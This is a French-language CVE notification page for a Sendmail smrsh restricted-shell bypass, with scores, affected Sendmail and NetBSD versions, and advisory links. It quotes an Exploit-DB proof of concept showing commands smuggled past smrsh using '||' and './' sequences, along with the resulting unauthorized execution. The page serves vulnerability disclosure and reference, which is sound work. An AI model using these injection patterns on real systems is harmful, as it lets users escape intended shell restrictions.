Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Sendmail Consortium's Restricted Shell (SMRSH) in Sendmail 8.12.6, 8.11.6-15, and possibly other versions after 8.11 from 5/19/1998, allows attackers to bypass the intended restrictions of smrsh by inserting additional commands after (1) "||" sequences or (2) "/" characters, which are not properly filtered or verified.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 4.6 | AV:L/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 21884
Date de publication : 2002-09-30 22h00 +00:00
Auteur : zen-parse
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/5845/info
Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.
smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment.
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
OR one of the following types of commands:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
Products Mentioned
Configuraton 0
Sendmail>>Sendmail >> Version 8.12.0
- Sendmail>>Sendmail >> Version 8.12.0 (Open CPE detail)
Sendmail>>Sendmail >> Version 8.12.1
- Sendmail>>Sendmail >> Version 8.12.1 (Open CPE detail)
Sendmail>>Sendmail >> Version 8.12.2
- Sendmail>>Sendmail >> Version 8.12.2 (Open CPE detail)
Sendmail>>Sendmail >> Version 8.12.3
- Sendmail>>Sendmail >> Version 8.12.3 (Open CPE detail)
Sendmail>>Sendmail >> Version 8.12.4
- Sendmail>>Sendmail >> Version 8.12.4 (Open CPE detail)
Sendmail>>Sendmail >> Version 8.12.5
- Sendmail>>Sendmail >> Version 8.12.5 (Open CPE detail)
Sendmail>>Sendmail >> Version 8.12.6
- Sendmail>>Sendmail >> Version 8.12.6 (Open CPE detail)
Configuraton 0
Netbsd>>Netbsd >> Version 1.5
- Netbsd>>Netbsd >> Version 1.5 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.5.1
- Netbsd>>Netbsd >> Version 1.5.1 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.5.2
- Netbsd>>Netbsd >> Version 1.5.2 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.5.3
- Netbsd>>Netbsd >> Version 1.5.3 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.6
- Netbsd>>Netbsd >> Version 1.6 (Open CPE detail)
- Netbsd>>Netbsd >> Version 1.6 (Open CPE detail)
Références
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000532
Tags : vendor-advisory, x_refsource_CONECTIVA
Tags : vendor-advisory, x_refsource_CONECTIVA
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-023.txt.asc
Tags : vendor-advisory, x_refsource_NETBSD
Tags : vendor-advisory, x_refsource_NETBSD
http://www.mandriva.com/security/advisories?name=MDKSA-2002:083
Tags : vendor-advisory, x_refsource_MANDRIVA
Tags : vendor-advisory, x_refsource_MANDRIVA
2025©
tesweb SA
